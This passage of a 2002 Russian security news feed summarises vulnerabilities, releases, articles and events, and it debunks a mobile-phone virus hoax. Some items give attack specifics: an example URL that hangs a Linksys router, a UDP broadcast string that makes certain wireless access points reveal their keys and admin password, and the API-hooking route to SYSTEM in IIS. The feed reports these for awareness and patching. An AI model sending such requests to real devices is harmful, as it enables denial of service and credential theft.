"Лаборатория Касперского" сообщает, что среди пользователей Интернет распространяются слухи о появлении нового компьютерного вируса, который заражает мобильные телефоны и приводит его в полную негодность. Рассылаемые сообщения выглядят следующим образом: "Если вам позвонили и на дисплее вашего мобильного телефона высвечивается АСЕ-? , не отвечайте на этот звонок, сразу прекратите. Если вы ответите на звонок, то ваш телефон будет заражен этим вирусом. Вирус сотрет всю информацию IMEI и IMSI с вашего телефона и с вашей SIM карточки, что сделает ваш телефон неспособным связываться с телефонной сетью. Вам придется покупать новый телефон. Эту информацию подтвердили фирмы Моторола и Нокиа. Уже 3 миллиона мобильных телефонов заражены этим вирусом в США. Эти сведения вы также можете проверить на сайте СNN. Пожалуйста, сообщите эту информацию всем друзьям". Также есть вариант текста на английском языке. "Лаборатория Касперского" заявляет, что сведений о существовании такого вируса нет, и классифицирует подобные слухи как вирусную мистификацию, не имеющую ничего общего с реальностью. Подробности - http://www.kaspersky.ru/news.html?id=1096719
7/11/2002 13:09 Сайты ВМС США содержали уязвимость.
Как сообщает wired, во вторник один из сайтов ВМС США был отключён от сети, а на другом была изменена система безопасности. Это произошло после того, как стало известно об утечке в Интернет информации из конфиденциальной базы данных ВМС. Похищенные файлы включали в себя информацию о разработке техники для тестирования электроники систем вооружения, имеющей название Consolidated Automated Support System. Также был получен доступ к сайту, содержащем информацию о ПО, разработанном для внутреннего использования в NSSC (Naval Supply Systems Command - типа нашего тылового обеспечения). Одна из секций базы данных, под названием QUADS содержала информацию о зарегистрированных в системе пользователях и их пароли. Как утверждается, уязвимость была обнаружена группой французских исследователей безопасности Kitetoa. На уязвимых серверах стояло ПО Lotus Domino. Группа Kitetoa также сообщает о похожих проблемах с безопасностью ПО Lotus на других правительственных и частных Вэб-сайтах. Подробности - http://www.wired.com/news/technology/0,1282,56219-1-13,00.html
7/11/2002 11:54 Microsoft продвигает Palladium в ряды Linux-приверженцев.
Пытаясь подготовить благодатную почву для ОС нового поколения, Microsoft активно поддерживает намерения конкурирующих разработчиков ПО и сообщества открытого кода включать в их изделия технологию защиты Palladium. Как утверждает директор по безопасности английского отделения Microsoft Стюарт Окин (Stuart Okin), компания заинтересована в том, чтобы сделать лицензию на Palladium как можно более доступной для других производителей и установить наиболее выгодные условия лицензирования. Это заявление можно считать ответом на появившиеся опасения, что технология, которая позволит поставщикам контента и программного обеспечения придавать законную силу авторским правам на файлы и документы электронным способом, крепко привяжет конечных пользователей к системам от Microsoft и укрепит его позиции как монополиста. Источник - http://www.cnews.ru
7/11/2002 11:22 Что было бы, если бы Microsoft включила NMAP в дистрибутив Windows.
Новость из разряда забавных. NMAP-продвинутый сканер, написанный господином Fyodor-ом. По отзывам специалистов и собственному опыту является одним из самых лучших сканеров в настоящее время. Поддерживает различные виды сканирования, в том числе "скрытое" (SYN, FIN, XMASS, NULL, UDP - сканирование). Позволяет на основании снятия "отпечатков" (Fingerprints) отклика на различные виды сканирования определить тип ОС (с определённой долей вероятности, естественно). Сайт проекта - www.insecure.org/nmap. Существуют версии для Win32, требующие, однако установки библиотеки WinPCAP. Ed Skoudis на сайте www.counterhack.net в виде комиксов представил, как бы выглядело сканирование посредством сканера NMAP, если бы он был включён в дистрибутив Windows и имел интерфейс, подобный "помощнику" Microsoft Word®, Microsoft Excel® и Microsoft Outlook® (кстати, сам NMAP при этом бы назывался - Microsoft Nmap®). В общем, как говорится, лучше один раз увидеть. :) Cсылка - http://www.counterhack.net/base_clippy_image.html
7/11/2002 10:51 Выход GnuPG 1.2.1.
GnuPG (GNU Privacy Guard) является разработанным в рамках проекта GNU инструментом для обеспечения шифрования данных. GnuPG заменztn PGP в открытых системах и используется для шифрации данных и генерирования цировых подписей. Также включает в себя систему управления ключами и полную совместимость с Интернет-стандартом OpenPGP cогласно RFC2440. Команда разработчиков на днях анонсировала новую версию этого инструмента - 1.2.1. Основные изменения, сделанные в новой версии касаются конфигурирования с использованием библиотек OpenLDAP, алгоритмов генерации ключей и устранения различных багов, обнаруженных в предыдущих версиях. Для скачивания новой версии можно воспользоваться многочисленными зеркалами сайта. Для апгрейда с предыдущей версии (1.2.0) предусмотрен патч. Исходники, сжатые BZIP2, весят 2.5 МБ. Есть версия для Win32 (размер архива 1.1 МБ). Ссылка на зеркала GnuPG - http://www.gnupg.org/mirrors.html
7/11/2002 10:40 Borland совершенствует JBuilder 8.
В понедельник компания Borland Software, ведущий производитель инструментов разработки Java, анонсировала новую версию своего инструментального комплекса. Компания сообщает, что новая версия JBuilder 8 включает поддержку среды разработки open-source Jakarta Struts, а также содержит усовершенствованные средства тестирования приложений Enterprise Java Beans, поддержки новых стандартов веб-сервисов и спецификации Java 2 Enterprise Edition 1.4. По словам представителей компании, JBuilder 8 упрощает управление кодом и отладку благодаря связи с такими инструментами, как Borland TeamSource, Rational ClearCase и Concurrent Versioning System (CVS). Теперь при помощи JBuilder можно отлаживать и не-Java код, такой как OracleJSP. Borland анонсировала также Optimizeit Suite 5, обновленную версию своего инструментария оптимизации производительности Java-приложений. Новая версия содержит средства автоматического обнаружения «утечки памяти», что позволяет эффективнее решать проблемы с быстродействием кода. Подробности - http://zdnet.com.com/2100-1104-964404.html
7/11/2002 10:32 Nokia представила систему управления безопасностью для мобильных приложений.
В понедельник Nokia представила систему управления безопасностью для мобильных приложений для телефонов и коммуникаторов, работающих под управлением операционной системы Symbian. Nokia Security Service Manager (NSSM) может использоваться для развертывания мобильных виртуальных частных сетей (VPN), обеспечивает безопасную установку ПО, автоматическую рассылку обновлений и удаленное конфигурирование систем безопасности мобильного терминала. NSSM работает на базе стандарта PKI (Public Key Infrastructure), имеет сервис работы с сертификатами - подтверждение (CA), регистрация (RA) и автоматический обмен. Бета-тестированием системы занимается компания Fujitsu Invia. NSSM появится в продаже через системных интеграторов и реселлеров Nokia в первом квартале 2003 года. Источник - http://www.cnews.ru
6/11/2002 15:42 ELF в Linux.
Новая статья на linuxgazette.com рассказывает о формате исполнительных файлов ELF. Автор приводит примеры дизассемблирования и анализа программ, описывает принципы динамической линковки. Ознакомиться - http://linuxgazette.com/issue84/hawk.html
6/11/2002 13:31 Cтатья "Введение в Linux".
На нижегородском сайте выложена для широкого обсуждения бета-версия статьи, посвящённой начальным азам для работе в дистрибутиве Linux Debian. Хотя автор (Николай Панов) и назвал её "Введение в Linux", основное внимание уделено как раз этому дистрибутиву. В само название вписывается только первый раздел - "Выбор дистрибутива" :). В статье рассмотрены наиболее часто возникающие вопросы/проблемы у начинающих пользователей. Статус beta-версии означает возможность любому желающему вносить (через автора) почти любые исправления, которые приветствуются. Статья - http://www.uic.nnov.ru/~nik/articles/IntroToDebian/index.html
6/11/2002 13:14 В МТП создана группа по борьбе с компьютерной преступностью.
Базирующаяся в Женеве Международная торговая палата (The International Chamber of Commerce, ICC) организовала специальную группу по борьбе с компьютерной преступностью. Она войдет в состав отделения ICC по борьбе с экономическими преступлениями (Commercial Crime Services). Группа не планирует заниматься непосредственно оперативно-розыскной деятельностью, а ограничится лишь сбором и анализом информации о компьютерных преступлениях, тесно контактируя с Интерполом. По мнению руководителя созданной группы Эрика Эллена (Eric Ellen), интернет стал широко использоваться преступниками, в первую очередь, для отмывания денег, электронного мошенничества и промышленного шпионажа. Подобная деятельность может теперь осуществляться в международном масштабе, в том числе, на территории разных стран. Источник - http://www.cnews.ru/topnews/2002/11/06/content3.shtml
6/11/2002 12:50 Как можно уменьшить вред, наносимый cookie-stealing XSS-атаками на IE.
Майкл Ховард, специалист по безопасности из корпорации Microsoft, утверждает, что Microsoft Internet Explorer team был разработан метод для уменьшения вреда, который мог бы быть нанесён при проведении в адрес атакуемого броузера IE атаки cookie-stealing (похищение cookies) при использовании уязвимости XSS в IE. Как утверждает Майкл, если Internet Explorer 6.0 SP1 обнаруживает cookie, cодержащий флаг HttpOnly, он возвращает пустую строку броузеру в ответ на запросивший cookie при помощи функции document.cookie скрипт. Однако, необходимо отметить, что подобный флаг должен устанавливать сервер, формирующий cookie на машине пользователя при обработке запроса. Применение подобного метода, естественно, не устранит существование XSS-уязвимости, однако может значительно уменьшить ущерб, который может быть нанесён при попытке похищения cookie. Подробности и способы выставки флага - http://msdn.microsoft.com/library/en-us/dncode/html/secure10102002.asp
6/11/2002 12:38 Уязвимость в HP TruCluster Server Interconnect.
Компании Hewlett-Packard и Compaq выпустили совместный бюллетень по безопасности SSRT2265, в котором констатируется наличие уязвимости в следующих ОС: HP TruCluster Server v. 5.0A/5.1/5.1A. Детали уязвимости не раскрываются, сообщается только, что её использование позволяет локально или удалённо выполнить атаку типа DoS. В остальных поддерживаемых ОС (HP-UX, HP-MPE/ix, HP NonStop Servers, HP OpenVMS) уязвимость не обнаружена. Для устранения рекомендуется применить соответствующий патч - ERP (Early Release Patches). SSRT2265 доступен - http://thenew.hp.com/country/us/eng/support.html
6/11/2002 12:20 Уязвимость в IRIX.
5 ноября фирмой SGI выпущен информационный бюллетень 20021101-01-P, в котором утверждается, что в демоне rpc.ttdbserverd, обслуживающем запросы ToolTalk в среде CDE (Common Desktop Environment), обнаружена уязвимость. Ей присвоены номера CAN-2002-0677(0678) в базе данных CVE. Уязвимость присутствует в ОС IRIX, выпускаемой SGI. Для устранения уязвимости рекомендуется обновить CDE до версии 5.2 и применить патч 4799. Подробности - http://www.sgi.com/support/security/
6/11/2002 10:50 Локальный XSS в Вэб-сервере IIS.
ARAI Yuu из японской группы Secure Net Service(SNS) обнаружена уязвимость в Вэб-сервере корпорации Microsoft IIS. Уязвимость является локальной и представляет из себя XSS (Cross-site Scripting). Суть уязвимости заключается в том, что в виртуальной директории IISHELP, создаваемой при установке IIS содержится определённый ASP-файл, который неверно разбирает внешние входные данные. Условия для уязвимости возникают в случае, когда администратор IIS-сервера просматривает специальным образом оформленную HTML-страницу, содержащую гиперссылку, либо при просмотре HTML-почтового сообщения. Уязвимость является локальной потому, что виртуальная директория IISHELP допускает только локальный доступ. Соответствующий HTML-тег не будет отфильтрован и, внедрённый в Вэб-страницу будет обработан броузером. Если страница просматривается в IE, cкрипт злоумышленника будет обработан в зоне безопасности "Intranet". При этом возникает возможность мониторинга сессий, копирования персональных данных на сторонний сайт или запуска определённых локальных программ (троянов, например). Уязвимость проверялась на связке IIS 5.0 + Windows 2000 Server + SP3. Устраняется кумулятивным патчем для IIS - MS02-062 Cumulative Patch for Internet Information Service (Q327696), выпущенном Microsoft. Была обнаружена 28 мая и опубликована только после выхода патча. Подробности - http://www.lac.co.jp/security/intelligence/SNSAdvisory/58.html
6/11/2002 10:15 Семинар "Solaris 9 - обзор новых возможностей".
Компания Softline 12 ноября проводит семинар "Solaris 9 - обзор новых возможностей", посвященный выходу новой ОС SUN Solaris 9. Рассматриваются основные особенности системы, ее компоненты и функциональные возможности, а также ряд компонентов Sun ONE интегрированных в систему, предназначенных для эффективного решения задач корпоративных IT-систем. Сравниваются возможности новой системы с предыдущими версиями Sun Solaris и преимущества перехода на Sun Solaris 9. Семинар будет проходит, как всегда, в Математическом институте им. Стеклова на ул. Губкина. Для участия необходима обязательная регистрация. Подробности - http://www.softline.ru/seminars
5/11/2002 15:34 Уязвимость в Oracle iSQL*Plus.
Группой NGSSoftware обнаружена уязвимость в Oracle iSQL*Plus - вэб-приложении, позволяющему пользователям формировать запросы к базе данных. Уязвимость присутствует в базе данных Oracle 9i R1,2 всех ОС. Приложение инсталлируется вместе с Oracle 9 и запускается "поверх" Apache. Обнаруженная уязвимость носит характер DoS (отказ в обслуживании). iSQL*Plus требует от пользователя до обработки запроса произвести вход в систему. После доступа к URL по умолчанию от имени пользователя "/isqlplus" предосталяется экран авторизации. При посылке Вэб-серверу слишком длинного параметра ID пользователя происходит переполнение внутреннего буфера на стеке с перезаписью сохранённого адреса возврата в программу. Это может позволить удалённому злоумышленнику запустить произвольный код в контексте безопасности Вэб-сервера (пользователь "SYSTEM" в Win-ситемах или пользователь "oracle" в других ОС). Взломанный таким образом Вэб-сервер может в дальнейшем использоваться для проведения атак на сервер базы данных. NGSSoftware предупредила Oracle 18 октября и на прошлой неделе Oracle были выпущены заплатки, скачать которые можно с http://metalink.oracle.com. Уязвимости был присвоен номер 2581911 в БД багов Oracle. Подробности - http://www.ngssoftware.com/advisories/ora-isqlplus.txt
5/11/2002 14:04 Возможность повышения привилегий в IIS.
Некто li0n из корейской фирмы A3 Security Consulting Co., Ltd. обнаружил очередную уязвимость в Вэб-сервере Microsoft IIS. Сообщается о возможности повышения полномочий до SYSTEM локальным пользователем в версиях IIS - 4.0/5.0/5.1. Уязвимость проверялась на сервере с установленной ОС Win2K c установленными Service pack2, Security rollup1 и кумулятивным патчем для IIS (Q319733). Уязвимость связана с тем, что процесс dllhost.exe выподняет обработку запросов пользователя от имени эккаунта SYSTEM. Процесс dllhost.exe выполняется с привилегиями IWAM_machinename и атакующий может манипулировать областью памяти процесса и похитить (приобрести) привилегии эккаунта SYSTEM, когда процесс приобретает права этого эккаунта. Другими словами, атакующий может выполнить произвольный код от имени SYSTEM со всеми вытекающими отсюда последствиями. Для осуществления атаки локальный злоумышленник может заставить dllhost.exe вызвать функцию MyCoImpersonateClient вместо функции ole32!CoImpersonateClient при помощи технологии hooking API. Также злоумышленник может подделать функцию MyCoImpersonateClient и выполнить необходимый ему код с привилегиями SYSTEM. Другой метод использования уязвимости заключается в вызове процесса dllhost.exe в отладчике и модификации содержимого памяти процесса dllhost.exe. Атакующий, используя эту уязвимость одним из описанных выше способов, может назначить произвольный эккаунт для локальной административной группы и выполнять программы с привилегиями администратора. Необходимо отметить, что уязвимость была обнаружена автором ещё в конце июня, однако опубликована только после выпуска Microsoft соответствующего патча MS02-062. Подробное описание - http://www.li0n.pe.kr/eng/advisory/ms/iis_impersonation.txt
5/11/2002 13:28 Модуль ядра Linux - AngeL v0.9.0.
Perego Paolo анонсировал выпуск новой версии модуля ядра Linux (LKM-Linux Kernel Module) под названием Angel. Модуль предназначен для обеспечения безопасности машины под управлением ОС Linux. Функция Angel заключается не в защите сервера снаружи, а в защите изнутри. При наличии этого модуля на уровне ядра производится блокирование пакетов, которые могут представлять опасность для остальных сетевых узлов (попытки проведения удалённых атак, формирование пакетов с неправильно сформированными заголовками IP и TCP). LKM Angel работает на сетевом уровне, блокируя все выходящие пакеты, содержимое которых похоже на некоторые заранее определённые шаблоны (сигнатуры) атак. Данные функции основаны на способностях файрволлинга ядра, позволяющих перехватывать TCP/IP-пакеты при проходы сетевого стека. Кроме того, Angel Обладает функциями враппера системных вызовов, предотвращая передачу в качестве параметра шеллкода программам с установленным битом SUID, а также запрос fork() в бесконечном цикле. Данный LKM может быть полезен администраторам для предотвращения атак изнутри во внешнюю сеть (Internet) как со стороны локальных пользователей, так и со стороны интранет-сети. Подробности - http://www.sikurezza.org/angel
5/11/2002 12:48 Раскрытие информации узла доступа в WLAN.
Tom Knienieder из KHAMSIN Security GmbH. в сообщает об обнаружении уязвимости в ПО WISECOM GL2422AP-0T, выпускаемом GlobalSunTech для WAP (Wireless Access Points). В процессе установки было обнаружено (посредством прослушивания траффика), что при посылке широковещательного запроса на UDP-порт 27155 со строкой "gstsearch" узел доступа (WAP) выдаёт открытым текстом свои конфигурационные данные: ключи wep, MAC-фильтр и пароль администратора. Запрос может выдаваться как со стороны беспроводной сети (WLAN), так и со стороны внутренней (LAN) сети. Выпущен экплоит, при помощи которого можно сформировать соответствующий широковещательный запрос. Судя по всему, уязвимость существует в версиях ПО для OEM-производителей WAP - D-Link, ALLOY, EUSSO, LINKSYS. Ввиду того, что сайт KHAMSIN содержит информацию на немецком языке, приводим ссылку на сайт security.nnov.ru. Подробности - http://www.security.nnov.ru/search/document.asp?docid=3713 Эксплоит - http://www.security.nnov.ru/files/accesspoint.c
5/11/2002 11:30 Cтатья "50 способов обойти систему обнаружения атак".
На сайте www.cyberinfo.ru опубликован перевод статьи Фреда Кохена "50 способов обойти систему обнаружения атак". Рассмотрены различные ситауции, которые могут быть применены для обхода защиты IDS (Intrussion Detection Sysytem). Статья - http://www.cyberinfo.ru/6/911_1.htm
5/11/2002 10:05 Скриншоты новой версии Windows.
На прошлой неделе на сайте Winbeta.org были опубликованы скриншоты разрабатываемой компании Microsoft следующей версии Windows. Как утверждают их авторы, скриншоты сделаны с версии Windows Codename Longhorn Build 6.0.3683.Lab06_N.020923-1821, вышедшей 23 сентября текущего года. Изначально планировалось, что Longhorn станет, своего рода, промежуточным звеном между существующими версиями ОС и системой Blackcomb, которая представляла бы совершенно новую операционную систему. Однако позже Microsoft начала уделять "переходной" версии Longhorn все больше внимания, что позволяет говорить о том, что именно эта версия ОС станет новым этапом в развитии операционных систем от Microsoft. Большую часть официальной информации о Longhorn рассказал основатель Microsoft Билл Гейтс летом этого года. Основным элементом Longhorn, по словам Гейтса, станет программно-аппаратная система безопасности, известная как Palladium. Эта система будет наблюдать за действиями пользователя, не позволяя нарушать принятые нормы безопасности данных. Кроме того, Palladium нацелена на борьбу с пиратством и будет также отвечать за ограничение копирования и распространения авторского контента. Подробности и скриншоты - http://www.compulenta.ru/2002/11/4/35190/
4/11/2002 14:10 ALT Linux сертифицирован ГТК.
Дистрибутив "Утес-К (ALT Linux Master 2.0)" сертифицирован Гостехкомиссией по 5 классу СВТ. Сертифицированный дистрибутив является совместным продуктом ALT Linux и НПФ "Пром Техн". Источник - http://www.altlinux.ru/
4/11/2002 13:50 Статья "Удалённое протоколирование".
На linuxsecurity помещена статья Armando Ortiz с полным названием "Remote Syslogging - A Primer". В статье автор подробно рассматривает работу демона syslogd и организацию протоколирования на удалённой машине. Подобная ситуация может быть особенно актуальна при компрометации сервера (взломе), в результате которой взломщик получает права суперпользователя и, естсественно, первым делом пытается замести следы - стереть лог-файлы. Статья - http://www.linuxsecurity.com/feature_stories/feature_story-123.html
4/11/2002 13:25 DoS против EtherFast Cable/DSL Router.
EtherFast Cable/DSL Router with 4-Port Switch - маршрутизатор от Linksys Group Inc.'s. Устройство зависает (DoS), когда атакующий обратится к сценарию Gozila.cgi без аргументов, используя IP адрес маршрутизатора. Пример: http://192.168.1.1/Gozila.cgi? Для восстановления нормальной работы потребуется жесткая перезагрузка устройства. Уязвимость обнаружена в BEFSR41 EtherFast Cable/DSL router 1.42.7 Подробности - http://www.securitylab.ru/?ID=34010
4/11/2002 12:18 Вторая региональная конференция "Информационная безопасность современного предприятия".
13 ноября "Поликом Про" совместно с московскими представительствами Microsoft, Intel, Cisco Systems, APC и ЗАО "Прикладная Логистика" (эксклюзивный дистрибьютор TrendMicro в России) проводят в санкт-петербургском бизнес-центре "Нептун" вторую региональную конференцию "Информационная безопасность современного предприятия". В докладах участников будет рассматриваться комплекс вопросов информационной безопасности современного предприятия - от методических аспектов до технологий и комплексных решений. Главной темой осенней конференции будет новая концепция надежных информационных технологий Trustworthy Computing, выдвинутая Microsoft в начале года и воплощающаяся сейчас на практике. Впервые в Санкт- Петербурге об этом расскажет Дмитрий Вишняков. Конференция будет проходить с 09:30 до 15:40 в среду 13 ноября в Международном Центре Делового Сотрудничества по адресу Санкт- Петербург, пл. Пролетарской диктатуры, 6 (ст. м. "пл. Восстания", "Маяковская", "Чернышевская"). Участие в конференции бесплатное, необходима предварительная регистрация. Подробности - http://www.polikom.ru/seminar
4/11/2002 12:15 SuSe Linux предлагает альтернативу Windows и Office.
Немецкая компания SuSe Linux анонсировала программное обеспечение Linux Office Desktop, которое может стать дешевой и эффективной заменой Microsoft Office. Основой SuSE Linux Office Desktop является операционная система SuSe Linux 8.1. Офисный пакет - StarOffice 6.0 от Sun, но при этом, используя Crossover Office от Codeweavers, можно запускать основные офисные Windows-приложения (Microsoft Word, Excel, PowerPoint и Visio 2000). В качестве графической среды пользователь может выбрать KDE 3.0.3 или GNOME 2.0. Для облегчения процесса инсталляции в состав Linux Office Desktop входят вспомогательные утилиты Yet Another Setup Tool (YaST2 - помощник в установке) и Acronis OS Selector (менеджер российской разработки для поддержки нескольких ОС на одном компьютере). Таким образом, работать с SuSE Linux Office Desktop сможет даже человек, не имеющий опыта эксплуатации Linux. Как считают в SuSe, их продукт будет востребован как индивидуальными пользователями, так и небольшими и средними компаниями. Источник - http://www.suse.com/
4/11/2002 12:05 Борьбе с компьютерными преступлениями мешает сокрытие фактов, считает глава ФБР.
После терактов 11 сентября 2001 г. ФБР, как и другие американские спецслужбы, предприняло ряд новых инициатив, направленных, в том числе, на борьбу с преступлениями в сфере информационных технологий. Однако, по мнению главы ФБР Роберта Мюллера, на пути борьбы с компьютерными преступлениями есть одно серьезное препятствие. Оно сводится к нежеланию многих компаний из частного сектора экономики сообщать о фактах взлома своих компьютерных сетей и других подобных инцидентах. Выступая на Национальном форуме по борьбе с электронной преступностью и кибертерроризмом Мюллер заявил, что ФБР получает втрое меньше сообщений о преступлениях в сфере ИТ, чем могло бы. "Вы не даете нам делать нашу работу," - сказал Мюллер, обращаясь к представителям частных компаний. Если число компаний, желающих сотрудничать с ФБР в расследовании компьютерных преступлений не будет расти, об увеличении эффективности работы спецслужб в данной области можно забыть, считает Мюллер. Источник - http://www.compulenta.ru
4/11/2002 10:15 Выход SYSLINUX 2.0.
Вышла новая версия пакета SYSLINUX - набора загрузчиков с дискеты, компакт-диска, раздела MS-DOS, сети и различных других устройств типа памяти. Пакет пригодится для разработчиков дистрибутивов, наборов восстановления (rescue disk), "тонких клиентов" и встраиваемых устройств. Помимо багфиксов, в версию 2.0 включена возможность написания плагинов для пользовательского интерфейса. Подробности - http://www.kernel.org/pub/linux/utils/boot/syslinux/syslinux-2.00.lsm
4/11/2002 1:57 Переполнение буфера в log2mail
Популярное ПО для проверки файлов журнала подвержено переполнению буфера. Об этом заявил на днях Enrico Zini. В числе первых, на это сообщение отреагировали разработчики Debian. Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-11-01-020-26-SC-DB-SW Updates - http://security.debian.org/pool/updates/main/l/log2mail/
3/11/2002 23:33 Cтатья "Реверс-инжиниринг троянского кода".
23 октября на сайте securityfocus.com опубликована статья Джо Стюарта, старшего аналитика по безопасности информации корпорации LURHQ Corporation, под названием "Reverse Engineering Hostile Code". Под термином "Hostile Code" автор подразумевает любой процесс в системе, действие которого не авторизовано админимтратором. Под эту категорию процессов попадают: трояны, вирусы, шпионские программы (spyware). Автор не ставил себе задачу глубокого описания процесса декодирования трояна, в статье описываются основные инструменты, при помощи которых этот процесс может быть выполнен. При этом автор ссылается на утилиты и программы для ОС UNIX, подчёркивая, что в Windows доступ к аналогичным инструментам можно получить при помощи пакета Cygwin, повзволяющего эмулировать среду UNIX на Win32 платформе. Рассматриваются следующие утилиты: dd, file, strings, hexedit, md5sum, diff, lsof, tcpdump, grep. Рассматриваются следующие этапы работы с кодом трояна: декомпиляция , дизассемблирование (UNIX - objdump, Win32 - IDA Pro, W32dasm), отладка (дебаггеры gdb в UNIX, SoftICE в Win32). Cтатья рекомендуется в качестве общего ознакомительного материала по дизассемблированию, отладке программ. В конце приведены ссылки на более подробную документацию. Подробности - http://online.securityfocus.com/infocus/1637
3/11/2002 22:40 Статья "Введение в обнаружение атак и анализ защищенности".
На сайте www.bugtraq.ru начата публикация документа, написанного Ребеккой Бейс, под названием "Введение в обнаружение атак и анализ защищенности". Перевод выполнен Алексеем Лукацким и Юрием Цаплевым из НИП "Информзащита". Документ был подготовлен в рамках проекта IDSC (Intrusion Detection Systems Consortium) - консорциума по системам обнаружения атак. Консорциум был образован в 1998 г. и ставил своими целями: содействие внедрению продуктов по обнаружению атак путем выработки общей терминологии, повышения осведомленности рынка, поддержания целостности продукта и оказания влияния на разработку промышленных стандартов. Представленный документ является первым из серии, посвященной системам обнаружения атак. Данные документы помогут текущим и будущим пользователям составить более полное представление о процессах обнаружения атак и анализа защищенности, так что они смогут выбрать именно те продукты, которые удовлетворяют их потребностям. Документ объясняет, каково место систем поиска уязвимостей и обнаружения атак в политике безопасности организации. Он включает рассмотрение различных случаев и описание сценариев, в которых данные продукты используются организациями-покупателями. Ссылка - http://www.bugtraq.ru/library/books/icsa/
3/11/2002 16:40 Вышла новая версия ReGet Deluxe.
ReGet Software объявила о выпуске новой версии своего менеджера закачки ReGet Deluxe 3.2. Основным нововведением этой версии стала дополнительная панель инструментов для Internet Explorer, которая предоставляет доступ к функциям ReGet Deluxe без необходимости открывать главное окно программы. Кроме того, улучшена система обработки cookies и исправлены почти все известные ошибки. ReGet Deluxe позволяет решить основные проблемы, с которыми сталкиваются пользователи при попытке скачать файлы из интернета. Среди этих проблем — внезапный разрыв связи (эта проблема особенно хорошо знакома пользователям dial-up соединений). Программа автоматически восстановит соединение и продолжит загрузку с того места, где она была прервана. Другая проблема пользователей — медленное соединение — решается благодаря технологии многопоточной загрузки, при которой несколько частей файла скачиваются одновременно, и скорость загрузки увеличивается в 3–5 раз. Источник - http://www.regetsoft.com
3/11/2002 16:15 Дистрибутив Knoppix 3.1.
Вашему вниманию предлагается дистрибутив Linux, загружаемый с CD и содержащий готовую файловую систему Linux. Содержит коллекцию ПО GNU/Linux, автоматически определяет аппаратное обемпечение компьютера, поддерживает огромное количество драйверов для графических, звуковых карт, различных SCSI и USB-устройств. Сразу после декодирования "на лету" (on-the-fly) CD содержит 2 ГБ готового (инсталлированного) софта. CD включает: ядро версии 2.4.x, KDE V3.0.3 c браузером Konqueror, ПО kppp,pppoeconf (DSL) и isdn-config для соединение с Интернет, GIMP версии 1.2 и много другое. Сайт проекта - http://www.knopper.net/knoppix/index-en.html
3/11/2002 15:40 Слабая схема шифрования паролей в MS SQL-сервере.
K. K. Mookhey из индийской компании Network Intelligence India Pvt. Ltd. обнаружил, что шифрование паролей при авторизации на SQL-сервере от Microsoft недостаточно надёжное, что позволяет злоумышленнику после прослушивания траффика между клиентом и сервером достаточно легко декодировать имя пользователя и пароль. Необходимо отметить, что MS SQL имеет 2 схемы аутентификации: Windows-аутентификация и встроенная SQL-аутентификация (с предварительно задданным эккаунтом "sa"). Слабым алгоритмом шифрации обладает второй тип аутентификации-встроенный механизм SQL-аутентификации. Это было отмечено ранее в выпущенном Дэвидом Литчфилдом документе "Threat Profiling Microsoft SQL Server". Сейчас Mokhey просто более конкретно расписывает схему шифрации логина и пароля. Согласно ему сначала производится конвертирование в UNICODE и затем применяется простая операция XOR. Для предотвращения расшифровки рекомендуется пользоваться более криптостойким алгоритмом аутентификации Windows. Также автор рекомендует для расшифровки паролей использовать выпущенный инструмент 'forceSQL', позволяющий подбирать пароли на основе словаря. Подробности - http://www.nii.co.in/vuln/sqlpass.html 'forceSQL' доступен - http://www.nii.co.in/tools.html
3/11/2002 14:30 Следы атаки на корневые DNS-сервера ведут в Южную Корею и США.
На конференции по безопасности Интернет, проходившей в Falls Church, штат Вайоминг, директор ФБР Роберт Мюллер сказал, что атака производилась с компьютеров, расположенных на территории Южной Кореи и США. Однако более подробно директор ФБР ничего не сказал, сообщив только, что расследование продолжается. Однако, судя по всему, сами компьютеры могли быть заражены троянцами для организации атаки типа DDoS (распределённый отказ в обслуживании-технология, при которой производится массовое заражение компьютеров для объединения их в единую сеть для нанесения удара по объекту). Дело в том. что значительное количество компьютеров в Южной Корее и США имеют доступ к Интернет с линий, имеющих очень высокую пропускную способность, что делает их очень привлекательными при необходимости забить (flooding) запросами жертву. Кроме того подчёркивается, что в последнее время Восточная Азия является источником многих компьютерных преступлений. Подробности - http://www.washingtonpost.com/wp-dyn/articles/A46872-2002Oct31.html
2/11/2002 18:39 Ядро Linux 2.6 будет управлять доступом к файлам.
Как известно (см. наши предыдущие новости) версия 2.5 ядра ОС Linux была приостановлена (не допускается внесение изменений в существующую версию ядра) для подготовки выпуска новой версии стабильного ядра ветки 2.6. В новой версии будут включены различные механизмы, которые присутствуют в коммерческих версиях Unix, в частности, будут включены различные улучшения в системе безопасности. Как стало известно vnunet, в новой версии Linux наконец-то появится механизм ACL (access control lists), позволяющий более гибко и безопасно управлять доступом к файловой системе. Подробности - http://www.vnunet.com/News/1136453
2/11/2002 18:23 Secure Programming for Linux and Unix HOWTO.
Adam Chalemian анонсировал новую версию своего документа из серии HOWTO, посвящённого описанию безопасного программирования для Linux и Unix. Версия документа получила номер 3.000. Документ содержит 158 страниц. В новой версии уделено значительное внимание новым "дырам" в безопасности ОС Linux/Unix. Ccылка - http://www.linuxsecurity.com/HOWTO/Secure-Programs-HOWTO/
2/11/2002 18:15 Выпущена OpenBSD 3.2.
1 ноября объявлено о выпуске версии 3.2 ОС OpenBSD. ОС поставляется с новой версией OpenSSH, симметричным и асимметричным шифрованием по умолчанию, Вэб-сервером Apache с chroot, меньшим количеством бинарников с установленным битом suid, новыми картинками для xdm-logins, фильтром пакетом с возможностью формирования правил для предотвращения подмены (spoofing) пакетов и другими обновлениями. Подробности - http://www.openbsd.org/32.html
2/11/2002 18:05 Террористы стали жертвами сотовой связи.
По мнению большинства политических обозревателей, стратегической ошибкой террористов, захвативших здание театрального центра на Дубровке, было неразумное пользование услугами сотовой связи. Операторы мобильной связи в срочном порядке увеличили пропускную способность сети в районе «Норд-Оста» и дали звонкам из этого района максимальный приоритет. Кроме того, все соединения могли контролироваться Федеральной службой безопасности, сотрудникам которой благодаря прослушиванию разговоров террористов удалось почерпнуть массу сверхценных сведений. Разговоры позволили узнать достаточно много о привычках, поведении и местоположении террористов в здании, что, несомненно, упростило проведение спецслужбами акции захвата здания театрального центра. С «органами» взаимодействовали также и члены семей заложников, задавая в телефонных разговорах с родственниками вопросы, подготовленные офицерами разведки, – ответы на эти вопросы также внесли свою лепту в «упрощение» освобождения захваченных людей. Вопросы формулировались таким образом, чтобы соответствующий заложник не мог вызвать подозрений со стороны захватчиков. «Мобильники были нашим тайным оружием», – сказал впоследствии один из руководителей штаба операции. Кстати, многие связывают невезение чеченских полевых командиров с мобильной свзяью: уже несколько десятков руководителей чеченского сопротивления – начиная с Джохара Дудаева и заканчивая Мовсаром Бараевым – было 